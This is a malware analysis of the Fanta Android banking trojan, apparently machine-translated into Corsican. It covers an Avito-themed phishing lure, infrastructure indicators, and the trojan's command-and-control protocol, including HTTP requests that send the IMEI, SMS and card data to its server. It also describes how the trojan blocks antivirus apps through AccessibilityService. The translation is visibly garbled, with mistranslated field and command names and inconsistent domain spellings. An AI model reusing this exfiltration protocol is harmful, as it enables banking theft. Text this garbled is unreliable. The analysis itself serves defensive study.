Un ghjornu vulete vende qualcosa in Avito è, dopu avè publicatu una descrizzione dettagliata di u vostru pruduttu (per esempiu, un modulu RAM), riceverete stu missaghju:
Na vota ca vo cliccate nant'à u buttone "Cuntinuà", un schedariu APK cù un icona è un nomu fiducia-inspiring sarà telecaricatu à u vostru aparechju Android. Avete installatu una applicazione chì per una certa ragione dumandava i diritti di AccessibilityService, dopu apparsu un paru di finestri è sparivanu rapidamente è... Eccu.
Andate à verificà u vostru equilibriu, ma per una certa ragione a vostra app bancaria dumanda di novu i dati di a vostra carta. Dopu avè intrutu in i dati, succede qualcosa di terribili: per una certa ragione ùn hè micca chjaru per voi, i soldi cumincianu à sparisce da u vostru contu. Pruvate di risolve u prublema, ma u vostru telefunu resiste: pressu i tasti "Back" è "Home", ùn si spegne micca è ùn vi permette micca di attivà e misure di sicurezza. In u risultatu, vi restate senza soldi, i vostri beni ùn sò micca acquistati, vi sò cunfusi è dumandate: ciò chì hè accadutu?
A risposta hè simplice: avete diventatu una vittima di u Trojan Fanta Android, un membru di a famiglia Flexnet. Cumu hè accadutu questu? Spieghemu avà.
Autori: Andrey Polovinkin, junior specialista in l'analisi di malware, Ivan Pisarev, specialista in l'analisi di malware.
Arcuni statìstichi
A famiglia Flexnet di troiani Android hè stata cunnisciuta per a prima volta in 2015. Duranti un piriudu longu di attività, a famiglia si stende à parechji subspecies: Fanta, Limebot, Lipton, etc. U Trojan, cum'è l'infrastruttura assuciata à questu, ùn si ferma micca: novi schemi di distribuzione efficaci sò sviluppati - in u nostru casu, pagine di phishing d'alta qualità destinate à un utilizatore-venditore specificu, è i sviluppatori Trojan seguenu i tendenzi di moda in scrittura di virus - aghjunghjendu una nova funziunalità chì permette di arrubà più efficacimente soldi da i dispositi infettati è i meccanismi di prutezzione.
A campagna descritta in questu articulu hè destinata à l'utilizatori di Russia; un picculu numeru di dispusitivi infettati sò stati registrati in Ucraina, è ancu menu in Kazakhstan è Bielorussia.
Ancu s'è Flexnet hè stata in l'arena di Troia Android per più di 4 anni è hè stata studiata in dettagliu da parechji circadori, hè sempre in bona forma. A partesi da ghjennaghju 2019, a quantità potenziale di danni hè più di 35 milioni di rubli - è questu hè solu per e campagne in Russia. In u 2015, diverse versioni di stu troianu Android sò stati venduti in fori sotterranei, induve u codice fonte di u troianu cù una descrizzione detallata puderia ancu esse truvatu. Questu significa chì e statistiche di danni in u mondu sò ancu più impressiunanti. Ùn hè micca un malu indicatore per un omu cusì vechju, ùn hè micca?
Da a vendita à l'ingannimentu
Comu pò esse vistu da a screenshot presentata prima di una pagina di phishing per u serviziu di Internet per publicà annunzii Avito, hè stata preparata per una vittima specifica. Apparentemente, l'attaccanti utilizanu unu di i parsers di Avito, chì estrae u numeru di telefunu è u nome di u venditore, è ancu a descrizzione di u produttu. Dopu l'espansione di a pagina è a preparazione di u schedariu APK, a vittima hè mandata un SMS cù u so nome è un ligame à una pagina di phishing chì cuntene una descrizzione di u so pruduttu è a quantità ricevuta da a "vendita" di u pruduttu. Cliccà nant'à u buttone, l 'utilizatori riceve un schedariu APK maliziusi - Fanta.
Un studiu di u duminiu shcet491[.]ru hà dimustratu chì hè delegatu à i servitori DNS di Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
U schedariu di zona di duminiu cuntene entrate chì puntanu à l'indirizzi IP 31.220.23[.]236, 31.220.23[.]243, è 31.220.23[.]235. In ogni casu, u registru di risorsa primaria di u duminiu (A record) punta à un servitore cù l'indirizzu IP 178.132.1[.]240.
L'indirizzu IP 178.132.1[.]240 si trova in i Paesi Bassi è appartene à l'hoster. WorldStream. L'indirizzi IP 31.220.23[.]235, 31.220.23[.]236 è 31.220.23[.]243 sò situati in u Regnu Unitu è appartenenu à u servitore di hosting cumuni HOSTINGER. Adupratu cum'è un registratore openprov-ru. I duminii seguenti sò ancu risolti à l'indirizzu IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Si deve esse nutatu chì i ligami in u seguente formatu eranu dispunibili da quasi tutti i domini:
http://(www.){0,1}<%domain%>/[0-9]{7}
Stu mudellu include ancu un ligame da un messagiu SMS. Basatu nantu à e dati storichi, hè stata truvata chì un duminiu currisponde à parechji ligami in u mudellu descrittu sopra, chì indica chì un duminiu hè stata utilizata per distribuisce u Trojan à parechje vittimi.
Andemu un pocu avanti: u troianu scaricatu via un ligame da un SMS usa l'indirizzu cum'è un servitore di cuntrollu onusedseddohap[.]club. Stu duminiu hè statu registratu u 2019-03-12, è à partesi da u 2019-04-29, l'applicazioni APK interagiscenu cù stu duminiu. Basatu nantu à e dati ottenuti da VirusTotal, un totale di 109 applicazioni interagiscenu cù stu servitore. U duminiu stessu risolviu à l'indirizzu IP 217.23.14[.]27, situatu in i Paesi Bassi è pussede da l'hoster WorldStream. Adupratu cum'è un registratore namecheap. I duminii sò ancu risolti à questu indirizzu IP bad-racoon[.]club (à partesi da u 2018-09-25) è bad-racoon[.]live (à partesi da u 2018-10-25). Cù duminiu bad-racoon[.]club più di 80 schedari APK interazzione cù bad-racoon[.]live - più di 100.
In generale, l'attaccu avanza cusì:
Chì ci hè sottu à u coperchio di Fanta ?
Cum'è parechji altri troiani Android, Fanta hè capaci di leghje è mandà missaghji SMS, fà richieste USSD, è affissà e so propiu finestri nantu à l'applicazioni (cumprese quelli bancari). Tuttavia, l'arsenale di funziunalità di sta famiglia hè ghjuntu: Fanta hà cuminciatu à aduprà Serviziu d'accessibilità per diversi scopi: leghje u cuntenutu di e notificazioni da altre applicazioni, impediscenu a rilevazione è piantà l'esekzione di un Trojan in un dispositivu infettatu, etc. Fanta funziona in tutte e versioni di Android micca più ghjovani di 4.4. In questu articulu, daremu un ochju più vicinu à u seguente campione Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immediatamente dopu à u lanciu
Immediatamente dopu à u lanciu, u Troia oculta a so icona. L'applicazione pò travaglià solu se u nome di u dispusitivu infettatu ùn hè micca in a lista:
- android_x86
- VirtualBox
- Nexus 5X (bullhead)
- Nexus 5 (rasoio)
Stu cuntrollu hè realizatu in u serviziu principale di u Trojan - MainService. Quandu lanciata per a prima volta, i paràmetri di cunfigurazione di l'applicazione sò inizializzati à i valori predeterminati (u furmatu per almacenà e dati di cunfigurazione è u so significatu seranu discututi dopu), è un novu dispositivu infettatu hè registratu in u servitore di cuntrollu. Una dumanda HTTP POST cù u tipu di messagiu serà mandatu à u servitore register_bot è infurmazione nantu à u dispusitivu infettatu (versione Android, IMEI, numeru telefonu, nome operatore è codice di u paese in quale l'operatore hè registratu). L'indirizzu serve cum'è u servitore di cuntrollu hXXp://onuseseddohap[.]club/controller.php. In risposta, u servitore manda un missaghju chì cuntene i campi bot_id, bot_pwd, servore - l'applicazione salva questi valori cum'è parametri di u servitore CnC. Parametru servore opzionale se u campu ùn hè statu ricevutu: Fanta usa l'indirizzu di registrazione - hXXp://onuseseddohap[.]club/controller.php. A funzione di cambià l'indirizzu CnC pò esse aduprata per risolve dui prublemi: per distribuisce a carica uniformemente trà parechji servitori (cù un gran numaru di dispusitivi infettati, a carica nantu à un servitore web senza ottimizzazione pò esse alta), è ancu aduprà una alternativa. server in casu di fallimentu di unu di i servitori CnC.
Se si verifica un errore durante l'inviu di a dumanda, u Trojan ripetirà u prucessu di registrazione dopu à 20 seconde.
Una volta chì u dispusitivu hè statu arregistratu bè, Fanta mostrarà u missaghju seguente à l'utilizatore:
Nota impurtante: u serviziu chjamatu Sicurezza di u sistema - u nome di u serviziu di Troia, è dopu cliccà u buttone OK Una finestra si apre cù i paràmetri di Accessibilità di u dispositivu infettatu, induve l'utilizatore deve cuncede i diritti di Accessibilità per u serviziu maliziusu:
Appena l'utilizatore si accende Serviziu d'accessibilità, Fanta accede à u cuntenutu di e finestre di l'applicazione è l'azzioni realizate in elli:
Immediatamente dopu avè ricivutu i diritti d'accessibilità, u Trojan richiede i diritti di l'amministratore è i diritti per leghje e notificazioni:
Utilizendu u Serviziu d'accessibilità, l'applicazione simula i tasti di tasti, dendu cusì tutti i diritti necessarii.
Fanta crea parechje istanze di basa di dati (chì saranu descritte più tardi) necessarii per almacenà e dati di cunfigurazione, è dinò l'infurmazioni raccolte in u prucessu nantu à u dispusitivu infettatu. Per mandà l'infurmazioni raccolte, u Trojan crea un compitu ripetutu pensatu per scaricà campi da a basa di dati è riceve un cumandamentu da u servitore di cuntrollu. L'intervallu per accede à CnC hè stabilitu secondu a versione Android: in u casu di 5.1, l'intervallu serà 10 seconde, altrimente 60 seconde.
Per riceve u cumandamentu, Fanta face una dumanda GetTask à u servitore di gestione. In risposta, CnC pò mandà unu di i seguenti cumandamenti:
squadra | discrizzione |
---|---|
0 | Mandate un missaghju SMS |
1 | Fate una telefonata o cumanda USSD |
2 | Aghjurnate un paràmetru intervallu |
3 | Aghjurnate un paràmetru intercetta |
6 | Aghjurnate un paràmetru smsManager |
9 | Cumincià à cullà i missaghji SMS |
11 | Resetta u vostru telefunu à i paràmetri di fabbrica |
12 | Attivà / Disattivà a registrazione di a creazione di a finestra di dialogu |
Fanta raccoglie ancu notifiche da 70 app bancari, sistemi di pagamentu veloci è e-wallets è li guarda in una basa di dati.
Salvà i paràmetri di cunfigurazione
Per almacenà i parametri di cunfigurazione, Fanta usa un approcciu standard per a piattaforma Android - Preferenze- i schedari. I paràmetri seranu salvati in un schedariu chjamatu iventi. A descrizzione di i paràmetri salvati hè in a tavola sottu.
nomu | Valore predeterminatu | I valori pussibuli | discrizzione |
---|---|---|---|
id | 0 | Integer | ID di u bot |
servore | hXXp://onuseseddohap[.]club/ | URL | L'indirizzu di u servitore di cuntrollu |
pwd | - | String | Password di u servitore |
intervallu | 20 | Integer | Intervallu di tempu. Indica quantu tempu i seguenti compiti duveranu esse differiti:
|
intercetta | tuttu | all/telNumber | Se u campu hè uguali à a stringa tuttu o telNumber, allura u messagiu SMS ricevutu sarà interceptatu da l'applicazione è micca mostratu à l'utilizatore |
smsManager | 0 | 0/1 | Attivà / disattivà l'applicazione cum'è u destinatariu SMS predeterminatu |
leghjeDialog | sbagliate | Veru/falsu | Attivà / Disattivà a registrazione di l'avvenimenti Eventu d'accessibilità |
Fanta usa ancu u schedariu smsManager:
nomu | Valore predeterminatu | I valori pussibuli | discrizzione |
---|---|---|---|
pckg | - | String | Nome di u gestore di messagi SMS utilizatu |
Interazzione cù basa di dati
Duranti u so funziunamentu, u Trojan usa dui basa di dati. Database chjamatu a utilizatu per almacenà diverse informazioni raccolte da u telefunu. A seconda basa di dati hè chjamata fantasia.db è hè utilizatu per salvà i paràmetri rispunsevuli di creà finestre di phishing pensate per cullà infurmazioni nantu à e carte bancarie.
Trojan usa a basa di dati а per almacenà l'infurmazioni raccolte è logà e vostre azzioni. I dati sò guardati in una tavola FIRMA. Per creà una tabella, utilizate a seguente query SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
A basa di dati cuntene l'infurmazioni seguenti:
1. Logging u startup di u dispusitivu nfittati cù un missaghju U telefuninu s'accende !
2. Notificazioni da l'applicazioni. U missaghju hè generatu secondu u mudellu seguente:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Dati di a carta bancaria da e forme di phishing create da u Troia. Parametru VIEW_NAME pò esse unu di i seguenti:
- AliExpress
- Avito
- Google Play
- Miscellaneous <%App Name%>
U missaghju hè registratu in u furmatu:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Missaghji SMS entranti / isciutu in u furmatu:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informazioni nantu à u pacchettu chì crea a finestra di dialogu in u formatu:
(<%Package name%>)<%Package information%>
Tavola d'esempiu FIRMA:
Una di e funziunalità di Fanta hè a cullizzioni di informazioni nantu à e carte bancarie. A raccolta di dati si faci per a creazione di finestre di phishing quandu si apre l'applicazioni bancarie. U Trojan crea a finestra di phishing solu una volta. L'infurmazione chì a finestra hè stata mostrata à l'utilizatore hè guardata in una tavula iventi in a basa di dati fantasia.db. Per creà una basa di dati, utilizate a seguente query SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Tutti i campi di a tavola iventi per difettu inizializatu à 1 (create una finestra di phishing). Dopu chì l'utilizatore inserisce i so dati, u valore serà stabilitu à 0. Esempiu di campi di tavula iventi:
- can_login - u campu hè rispunsevuli di visualizà a forma quandu apre una applicazione bancaria
- prima_banca - micca usatu
- can_avitu - u campu hè rispunsevuli di visualizà u furmulariu quandu apre l'applicazione Avito
- can_ali - u campu hè rispunsevuli di visualizà a forma quandu apre l'applicazione Aliexpress
- pò_altru - u campu hè rispunsevuli di visualizà u furmulariu quandu apre ogni applicazione da a lista: Yula, Pandao, Drom Auto, Wallet. Carte sconti è bonus, Aviasales, Booking, Trivago
- can_card - u campu hè rispunsevuli di visualizà a forma quandu apre Google Play
Interazzione cù u servitore di gestione
L'interazzione di a rete cù u servitore di gestione si faci via u protocolu HTTP. Per travaglià cù a reta, Fanta usa a famosa biblioteca di Retrofit. E dumande sò mandate à: hXXp://onuseseddohap[.]club/controller.php. L'indirizzu di u servitore pò esse cambiatu quandu si registra in u servitore. I cookies ponu esse mandati in risposta da u servitore. Fanta fa e seguenti dumande à u servitore:
- A registrazione di u bot in u servitore di cuntrollu hè una volta, à u primu lanciu. I seguenti dati nantu à u dispositivu infettatu sò mandati à u servitore:
· Marco - cookies ricevuti da u servitore (u valore predeterminatu hè una stringa viota)
· modu - custanti di corda register_bot
· prefissu - custante intera 2
· versione_sdk - hè furmatu secondu u mudellu seguente: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - IMEI di u dispusitivu infettatu
· paese - codice di u paese in u quale l'operatore hè registratu, in furmatu ISO
· nùmeru - numeru di telefonu
· operatore - nome di l'operatoreUn esempiu di una dumanda mandata à u servitore:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
In risposta à a dumanda, u servitore deve rinvià un oggettu JSON chì cuntene i seguenti parametri:
· bot_id - ID di u dispusitivu infettatu. Se bot_id hè uguale à 0, Fanta ri-eseguirà a dumanda.
bot_pwd - password per u servitore.
servitore - cuntrollu di l'indirizzu di u servitore. Parametru facultativu. Se u paràmetru ùn hè micca specificatu, l'indirizzu salvatu in l'applicazione serà utilizatu.Esempiu d'ughjettu JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Richiesta di riceve un cumandamentu da u servitore. I seguenti dati sò mandati à u servitore:
· Marco - cookies ricevuti da u servitore
· lignu - ID di u dispusitivu infettatu chì hè statu ricevutu quandu invià a dumanda register_bot
· pwd - password per u servitore
· divice_admin - u campu determina se i diritti di amministratore sò stati ottenuti. Se i diritti di amministratore sò stati ottenuti, u campu hè uguali à 1, altrimenti 0
· di Licodia - Statu di u funziunamentu di u serviziu di l'accessibilità. Se u serviziu hè statu cuminciatu, u valore hè 1, altrimenti 0
· SMSManager - mostra se u Trojan hè attivatu cum'è l'applicazione predeterminata per riceve SMS
· schermu - mostra in quale statu hè u screnu. U valore serà stabilitu 1, se u screnu hè nantu, altrimenti 0;Un esempiu di una dumanda mandata à u servitore:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Sicondu u cumandamentu, u servitore pò rinvià un oggettu JSON cù diversi parametri:
· squadra Mandate un missaghju SMS: I paràmetri cuntenenu u numeru di telefunu, u testu di u messagiu SMS è l'ID di u missaghju mandatu. L'identificatore hè utilizatu per mandà un missaghju à u servitore cù u tipu setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· squadra Fate una telefonata o cumanda USSD: U numeru di telefunu o cumanda vene in u corpu di risposta.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· squadra Cambia u paràmetru di l'intervallu.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· squadra Cambia u paràmetru di intercettazione.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· squadra Cambia u campu di SMSManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· squadra Cullate missaghji SMS da un dispositivu infettatu.
{ "response": [ { "mode": 9 } ], "status":"ok" }
· squadra Resetta u vostru telefunu à i paràmetri di fabbrica:
{ "response": [ { "mode": 11 } ], "status":"ok" }
· squadra Cambia u paràmetru ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Mandendu un missaghju cù u tipu setSmsStatus. Questa dumanda hè fatta dopu chì u cumandamentu hè eseguitu Mandate un missaghju SMS. A dumanda s'assumiglia cusì:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Caricà u cuntenutu di a basa di dati. Una fila hè trasmessa per dumanda. I seguenti dati sò mandati à u servitore:
· Marco - cookies ricevuti da u servitore
· modu - custanti di corda setSaveInboxSms
· lignu - ID di u dispusitivu infettatu chì hè statu ricevutu quandu invià a dumanda register_bot
· u testu - testu in u registru attuale di a basa di dati (campu d da a tavula FIRMA in a basa di dati а)
· nùmeru - nome di u registru attuale di a basa di dati (campu p da a tavula FIRMA in a basa di dati а)
· sms_mode - valore integer (campu m da a tavula FIRMA in a basa di dati а)A dumanda s'assumiglia cusì:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
Se mandatu successu à u servitore, a fila serà sguassata da a tavula. Esempiu di un oggettu JSON restituitu da u servitore:
{ "response":[], "status":"ok" }
Interagisce cù AccessibilityService
AccessibilityService hè statu implementatu per fà i dispositi Android più faciule d'utilizà per e persone cù disabilità. In a maiò parte di i casi, l'interazzione fisica hè necessaria per interagisce cù una applicazione. AccessibilityService vi permette di fà li programmatically. Fanta utilizza u serviziu per creà finestri falsi in l'applicazioni bancarie è impedisce à l'utilizatori di apre i paràmetri di u sistema è alcune applicazioni.
Utilizendu a funziunalità di l'AccessibilityService, u Trojan monitors cambiamenti à elementi nantu à a pantalla di u dispusitivu infettatu. Comu descrittu prima, i paràmetri di Fanta cuntenenu un paràmetru rispunsevule per l'operazioni di logu cù scatuli di dialogu - leghjeDialog. Se stu paràmetru hè stabilitu, l'infurmazioni nantu à u nome è a descrizzione di u pacchettu chì hà attivatu l'avvenimentu serà aghjuntu à a basa di dati. U Trojan esegue e seguenti azzioni quandu l'avvenimenti sò attivati:
- Simula a pressione di i tasti back è home in i seguenti casi:
· s'è l 'utilizatore voli rilancià u so dispusitivu
· se l'utilizatore vole sguassà l'applicazione "Avito" o cambià i diritti d'accessu
· se ci hè una menzione di l'applicazione "Avito" in a pagina
· quandu apre l'applicazione Google Play Protect
· quandu apre e pagine cù i paràmetri di AccessibilityService
· quandu a finestra di dialogu di Sicurezza di u Sistema appare
· quandu apre a pagina cù i paràmetri "Draw over other app".
· quandu apre a pagina "Applicazioni", "Recovery and reset", "Data reset", "Reset settings", "Developer panel", "Special. opportunità", "Oportunità speciali", "diritti speciali"
· se l'avvenimentu hè statu generatu da certe applicazioni.Lista di applicazioni
- Applicazioni
- Maestru Lite
- Clean Master
- Clean Master per CPU x86
- Gestione di permessi di l'applicazione Meizu
- Sicurezza MIUI
- Clean Master - Antivirus & Cache è Garbage Cleaner
- Cuntrolli parentali è GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Antivirus Avast è prutezzione gratuita 2019
- Mobile Security MegaFon
- Prutezzione AVG per Xperia
- Sicurezza Mobile
- Antivirus è prutezzione Malwarebytes
- Antivirus per Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- Antivirus AVG per u Manager di sistema di tablette Huawei
- Samsung Accessibilità
- Samsung Smart Manager
- Maestru di Sicurezza
- Booster di Velocità
- dr.web
- Spaziu di Sicurezza Dr.Web
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus è Securità Mobile
- Kaspersky Internet Security: Antivirus è Prutezzione
- Durata di a Batteria di Kaspersky: Risparmio è Booster
- Kaspersky Endpoint Security - prutezzione è gestione
- AVG Antivirus free 2019 - Prutezzione per Android
- Antivirus Android
- Norton Mobile Security è Antivirus
- Antivirus, firewall, VPN, sicurezza mobile
- Sicurezza Mobile: antivirus, VPN, prutezzione di furtu
- Antivirus per Android
- Se u permessu hè dumandatu quandu invià un missaghju SMS à un numeru cortu, Fanta simula cliccà nantu à a casella di cuntrollu Ricurdate a scelta è buttone mandà.
- Quandu pruvate di caccià i diritti di l'amministratore da u Trojan, chjude u screnu di u telefunu.
- Impedisce l'aghjunghje novi amministratori.
- Se l'applicazione antivirus dr.web rilevatu una minaccia, Fanta imita pressu u buttone ignurà.
- U Trojan simula pressu u buttone di ritornu è di casa se l'avvenimentu hè statu generatu da l'applicazione Cura di u dispositivu Samsung.
- Fanta crea finestre di phishing cù forme per inserisce infurmazioni nantu à e carte bancarie se una applicazione da una lista di circa 30 servizii Internet differenti hè stata lanciata. Frà elli: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Forme di phishing
Fanta analizeghja quali applicazioni sò in esecuzione nantu à u dispositivu infettatu. Se una applicazione d'interessu hè stata aperta, u Troia mostra una finestra di phishing sopra à tutti l'altri, chì hè una forma per inserisce l'infurmazioni di a carta bancaria. L'utilizatore deve inserisce i seguenti dati:
- Numeru di carta
- Data di scadenza di a carta
- CVV
- Nome di u titularu di a carta (micca per tutte e banche)
Sicondu l'applicazione in esecuzione, diverse finestre di phishing seranu mostrate. Quì sottu sò esempi di alcuni di elli:
Aliexpress:
Avitu:
Per alcune altre applicazioni, p.e. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Cumu era veramente
Fortunatamente, a persona chì hà ricivutu u missaghju SMS descritta à l'iniziu di l'articulu hè statu un specialista in cibersigurtà. Per quessa, a versione vera, non-direttore hè differente da quellu chì hà dettu prima: una persona hà ricevutu un SMS interessante, dopu chì l'hà datu à a squadra di l'Intelligenza di Caccia di Minaccia di Group-IB. U risultatu di l'attaccu hè questu articulu. Finale felice, nò? Tuttavia, micca tutti i stori finiscinu cusì successu, è cusì chì u vostru ùn pare micca un tagliu di direttore cù una perdita di soldi, in a maiò parte di i casi, hè abbastanza per aderisce à e seguenti regule longu descritte:
- ùn installate micca l'applicazioni per un dispositivu mobile cù u sistema operativo Android da qualsiasi fonti altru chè Google Play
- Quandu stallate una applicazione, fate una attenzione particulari à i diritti dumandati da l'applicazione
- fate attenzione à l'estensione di i schedari telecaricati
- stallà l'aghjurnamenti di u sistema operativo Android regularmente
- ùn visitate micca risorse sospette è ùn scaricate micca i schedari da quì
- Ùn cliccate micca nantu à i ligami ricevuti in i missaghji SMS.
Source: www.habr.com